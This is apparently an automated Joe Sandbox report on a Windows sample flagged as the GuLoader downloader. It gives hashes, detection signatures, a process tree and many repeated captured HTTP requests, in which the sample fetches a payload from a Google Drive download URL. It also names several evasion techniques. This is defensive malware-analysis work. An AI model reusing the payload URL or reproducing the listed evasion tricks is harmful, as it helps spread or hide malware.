Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Osb7hkGfAb.exe

Overview

General Information

Sample name:Osb7hkGfAb.exe
renamed because original name is a hash value
Original sample name:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
Analysis ID:1587621
MD5:a09950fd9af3c4e3ff6f778ab5d8ce0f
SHA1:043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
SHA256:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Osb7hkGfAb.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
    • Osb7hkGfAb.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:54:59.027407+010028032702Potentially Bad Traffic192.168.2.949711142.250.184.206443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Osb7hkGfAb.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: Osb7hkGfAb.exeVirustotal: Detection: 68%Perma Link
      Source: Osb7hkGfAb.exeReversingLabs: Detection: 75%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Osb7hkGfAb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.9:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.9:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49757 version: TLS 1.2
      Source: Osb7hkGfAb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 142.250.184.206:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
